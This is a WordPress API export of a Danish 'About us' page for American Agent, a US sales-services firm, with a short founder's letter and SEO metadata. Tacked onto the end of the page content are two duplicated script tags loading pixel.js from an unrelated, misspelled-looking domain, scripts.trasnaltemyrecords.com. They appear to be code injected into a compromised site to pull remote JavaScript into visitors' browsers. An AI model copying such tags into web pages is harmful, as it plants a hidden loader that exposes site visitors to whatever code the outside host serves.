{"id":2986,"date":"2014-08-30T08:16:10","date_gmt":"2014-08-30T12:16:10","guid":{"rendered":"https:\/\/americanagent.com\/about-2\/"},"modified":"2014-09-08T14:28:46","modified_gmt":"2014-09-08T18:28:46","slug":"om-os","status":"publish","type":"page","link":"https:\/\/americanagent.com\/da\/om-os\/","title":{"rendered":"Om os"},"content":{"rendered":"<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-0  el_before_av_two_third  avia-builder-el-first  first flex_column_div  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_image-4c831013215c2f0be6e3dcc06f11ca80\">\n.avia-image-container.av-av_image-4c831013215c2f0be6e3dcc06f11ca80 img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-av_image-4c831013215c2f0be6e3dcc06f11ca80 .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-av_image-4c831013215c2f0be6e3dcc06f11ca80 av-styling- avia_animated_image av-animated-when-visible-95 top-to-bottom avia-align-center  avia-builder-el-1  avia-builder-el-no-sibling '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-4019 avia-img-lazy-loading-not-4019 avia_image ' src=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg\" alt='' title='about'  height=\"2592\" width=\"2022\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg 2022w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-234x300.jpg 234w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-803x1030.jpg 803w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-1170x1500.jpg 1170w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-549x705.jpg 549w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-450x576.jpg 450w\" sizes=\"(max-width: 2022px) 100vw, 2022px\" \/><\/div><\/div><\/div><\/div><div  class='flex_column av-av_two_third-eb9537ee683f4a660cd6980e383a136f av_two_third  avia-builder-el-2  el_after_av_one_third  avia-builder-el-last  flex_column_div  '     ><section  class='av_textblock_section av-av_textblock-6bbb9745c24ef102d1f3feabac50c46d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span class='av_dropcap1 av-av_dropcap1-3cd9da5fea0ef5fb27aee617571c39a3'><span style=\"color: #000000;\">S<\/span><\/span>iden 2002 har vi hjulpet de europ\u00e6iske virksomheder med at komme ind p\u00e5 det amerikanske marked med den st\u00e6rkest mulige salgsstrategi. Uanset den service vi yder til vores kunder, er vores m\u00e5l altid, at opn\u00e5 det bedst mulige salgs setup for vores kunders tilstedev\u00e6relse p\u00e5 det amerikanske marked.<\/p>\n<p>De amerikanske virksomheders k\u00f8be modeller har \u00e6ndret sig drastisk i l\u00f8bet af de sidste par \u00e5r over hele branchen &#8211; Hvis du \u00f8nsker at tackle det amerikanske marked, m\u00e5 du hellere have en solid plan klar og v\u00e6re villig til at overveje nogle nye strategier.<\/p>\n<p>Jeg vil personligt gerne invitere din kontaktperson til at fort\u00e6lle os om din virksomhed og om dine behov her i USA, for vi kan sikkert komme med nye ideer til dine overvejelser.<\/p>\n<p>Med venlig hilsen<\/p>\n<p><strong>Mr. Kari Koivuniemi<\/strong><\/p>\n<p><strong>Stifter og CEO<\/strong><\/p>\n<\/div><\/section><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-2986","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Om os - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/da\/om-os\/\" \/>\n<meta property=\"og:locale\" content=\"da_DK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Om os - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/da\/om-os\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-08T18:28:46+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/om-os\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/om-os\\\/\",\"name\":\"Om os - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\"},\"datePublished\":\"2014-08-30T12:16:10+00:00\",\"dateModified\":\"2014-09-08T18:28:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/om-os\\\/#breadcrumb\"},\"inLanguage\":\"da-DK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/da\\\/om-os\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/om-os\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Om os\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/da\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"da-DK\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Om os - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/da\/om-os\/","og_locale":"da_DK","og_type":"article","og_title":"Om os - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/da\/om-os\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-08T18:28:46+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/da\/om-os\/","url":"https:\/\/americanagent.com\/da\/om-os\/","name":"Om os - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/da\/#website"},"datePublished":"2014-08-30T12:16:10+00:00","dateModified":"2014-09-08T18:28:46+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/da\/om-os\/#breadcrumb"},"inLanguage":"da-DK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/da\/om-os\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/da\/om-os\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/da\/"},{"@type":"ListItem","position":2,"name":"Om os"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/da\/#website","url":"https:\/\/americanagent.com\/da\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/da\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"da-DK"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/2986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/comments?post=2986"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/2986\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/media?parent=2986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}